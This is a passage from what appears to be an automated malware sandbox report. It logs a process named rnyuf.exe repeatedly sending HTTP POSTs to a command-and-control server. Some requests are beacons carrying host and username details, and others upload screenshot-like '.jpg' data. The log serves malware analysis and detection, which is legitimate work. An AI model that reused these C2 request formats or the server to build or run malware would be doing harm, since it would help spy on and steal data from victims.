                                        123192.168.2.44986146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:51.074291945 CEST10660OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:51.154222965 CEST10661INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:51 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:27:52.444906950 CEST10670OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----f8365e60c09cb72ff566abbc48b42f93
                                        Host: 46.17.96.36
                                        Content-Length: 112208
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:52.445014954 CEST10671OUTData Raw: 2d 2d 2d 2d 2d 2d 66 38 33 36 35 65 36 30 63 30 39 63 62 37 32 66 66 35 36 36 61 62 62 63 34 38 62 34 32 66 39 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------f8365e60c09cb72ff566abbc48b42f93Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:52.445240021 CEST10681OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:52.445292950 CEST10683OUTData Raw: 5d cf fe 82 6b 93 ae b3 e1 9f fc 94 7d 13 fe bb 9f fd 04 d4 4f e1 65 43 e2 47 d5 94 51 55 1e d2 76 76 61 a8 dc a0 27 21 55 63 c0 f6 e5 33 5e 71 de 5b a2 a9 fd 8a 7f fa 09 dd ff 00 df 31 7f f1 14 7d 8a 7f fa 09 dd ff 00 df 31 7f f1 14 01 72 8a a7
                                        Data Ascii: ]k}OeCGQUvva'!Uc3^q[1}1r)'w|Q)'w|P*G@(bw_Ebw_E\1}1r)'w|Q)'w|P*
                                        Aug 29, 2021 22:27:52.480648041 CEST10689OUTData Raw: c7 16 17 11 29 f3 f3 3b da 4d 22 62 f5 81 ac 9c df 2f fd 73 1f cc d6 c6 fa c5 d5 4e 6f 17 fe b9 8f e6 6b b3 2e 56 ae 8f 27 89 67 7c 0b 5e 68 a5 45 25 2d 7d 09 f9 d0 51 45 14 01 f6 26 92 17 fb 26 c4 b2 2b 62 04 ea 3f d9 15 a2 60 8d 90 37 94 80 11
                                        Data Ascii: );M"b/sNok.V'g|^hE%-}QE&&+b?`7oVv {/Olfh15X4NPzi(EH;JPk<H[o^mdf8?, <Ebx2>3i(fz4iRUa9s7sWpE-
                                        Aug 29, 2021 22:27:52.480916977 CEST10694OUTData Raw: 26 8e 38 65 92 29 12 39 94 b4 4e ca 40 70 09 04 a9 ee 32 08 e3 b8 ad 6e 8c ec c6 51 4b 8a b7 a7 e9 5a 8e ad 2b c5 a6 e9 f7 57 b2 22 ee 64 b6 85 a4 2a 3d 48 50 70 28 11 6f c3 b7 d1 5b 78 87 4b 6d 42 66 1a 72 5d 44 6e 54 ee 65 f2 83 8d dc 0e 48 db
                                        Data Ascii: &8e)9N@p2nQKZ+W"d*=HPp(o[xKmBfr]DnTeH{=b$_4{WXhUqH CT~4Yg%}um"IwD d.:ist|(SO/RAj>Akan!UHd09
                                        Aug 29, 2021 22:27:52.480962038 CEST10705OUTData Raw: bd ff 00 12 95 58 ae 9d bf 03 d4 be dd a1 c9 ab 5f 4a d1 e8 d7 fa 94 76 3a 7a 45 18 bc b5 8a 0d ab 16 26 58 da 74 78 b2 1b 68 c6 03 63 38 23 04 1e 3f c4 77 76 7f d8 da 4d 9d 8d b6 9d 09 22 e2 4b 95 83 cb 96 54 61 3c a1 15 a5 51 92 02 6d c7 38 61
                                        Data Ascii: X_Jv:zE&Xtxhc8#?wvM"KTa<Qm8a|AB{kj~ {ACrK,J<|Y&t`8hUe\NqG?[!GAKEQEQE(hisE (
                                        Aug 29, 2021 22:27:52.484258890 CEST10710OUTData Raw: 14 72 a0 e7 65 7f b3 fb d2 79 0c 3a 73 56 76 d2 81 47 b3 41 ed 19 48 c4 e3 b1 a3 69 1d aa f6 28 22 8f 66 1e d0 a3 83 4a 3a d5 cf 2d 4f 6a 43 6e a7 d4 52 f6 6c 7e d1 15 69 6a 7f b3 7a 1a 69 b7 61 47 23 0e 78 91 81 4b b6 9c 63 61 da 93 04 52 b3 0b
                                        Data Ascii: rey:sVvGAHi("fJ:-OjCnRl~ijziaG#xKcaRKEEPE.=E;P+c4bB( bZQKLAEZQ@KRKTKZAK(AJ*RZdRLAKE(H)i;RGpIJ)GJZO:"Y(jpjw%L)M0#
                                        Aug 29, 2021 22:27:52.516297102 CEST10721OUTData Raw: e1 e3 72 7c 56 2a a2 8d d2 82 fe b6 3a 72 99 52 c0 d3 94 a6 af 37 f9 1e 83 e3 ff 00 1f c1 65 6d 36 91 a4 4c 24 bc 90 6c 9a 64 39 11 0e e0 1f ef 7f 2f ad 78 d8 a2 81 5e e6 03 01 4b 05 4b d9 d3 f9 be e1 88 c4 4e bc f9 a4 06 8e d4 b4 86 bb 8c 02 96
                                        Data Ascii: r|V*:rR7em6L$ld9/x^KKNRQxDS~&t cZPlU8=_$iqcSZMkw<+'nzWG-tkJp;S-#U06k+_J2Aw+/'k
                                        Aug 29, 2021 22:27:52.516340971 CEST10723OUTData Raw: b7 64 e2 9c 29 88 32 6a c0 8f 03 9a a4 ae 4c 9a 43 40 cd 28 5a 90 01 4e 18 ad 2c 66 e4 30 2e 29 eb c5 2d 26 69 a4 45 ee 2e 69 45 25 2d 31 0e 14 bd a9 a0 f3 4b 40 80 52 e6 9b 9e 68 22 80 1d b8 51 9f 4a 6f 34 00 4d 01 64 3f 3c 75 a3 39 a4 0b 4f 0b
                                        Data Ascii: d)2jLC@(ZN,f0.)-&iE.iE%-1K@Rh"QJo4Md?<u9OLH((%L)J:P&-9O4sKfr)4hhz\j=BSFr[#YVE-RR@)i)i)E%(A@HJ))E!1)"Wm$*Pv
                                        Aug 29, 2021 22:27:52.516357899 CEST10731OUTData Raw: b4 3c 47 aa 5a ea d7 76 f3 e9 f7 44 58 04 2b 0e 9c 55 87 d8 ce 7e 6e a0 2b 6f 3f 36 e1 c9 cf cd 83 d6 a6 8b 7b 16 9d ae 59 5d cf 9f b3 a4 bb 67 00 64 98 98 15 71 ff 00 7c 93 5b 53 9c a5 4b 9b a9 95 48 46 35 6d d0 b5 1f 87 af 64 1a 41 df 02 ae a9
                                        Data Ascii: <GZvDX+U~n+o?6{Y]gdq|[SKHF5mdABn6sol73Cl-LX5_i``;[|mN~c@5>!t6k}6mZ9<)hUIW!=0N6*7CoaOI|-|d3Z56P'ypT
                                        Aug 29, 2021 22:27:52.629473925 CEST10784INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:52 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        124192.168.2.44986346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:52.574785948 CEST10783OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:52.655003071 CEST10784INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:52 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        125192.168.2.44986446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:52.841491938 CEST10785OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:52.911488056 CEST10799INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:52 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        126192.168.2.44986546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:52.888051987 CEST10785OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:52.888127089 CEST10786OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:52.888323069 CEST10796OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:52.888407946 CEST10798OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:52.925832033 CEST10804OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:52.925860882 CEST10807OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:52.925873995 CEST10815OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:52.925884962 CEST10819OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:27:52.925894022 CEST10824OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:52.961066008 CEST10830OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:52.961118937 CEST10835OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:53.073076963 CEST10894INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        127192.168.2.44986646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:53.114259005 CEST10894OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:53.197138071 CEST10895INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        128192.168.2.44986746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:53.323744059 CEST10895OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:53.323931932 CEST10896OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:53.324089050 CEST10906OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:53.324167013 CEST10908OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:53.357639074 CEST10914OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:53.357992887 CEST10917OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:53.358201981 CEST10934OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:53.390091896 CEST10937OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:53.390336037 CEST10948OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:53.390732050 CEST10950OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:53.390784025 CEST10969OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:53.494416952 CEST11004INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        129192.168.2.44986846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:53.348179102 CEST10909OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:27:53.430233002 CEST11003INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:53 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        13192.168.2.44974846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:14.367435932 CEST2420OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
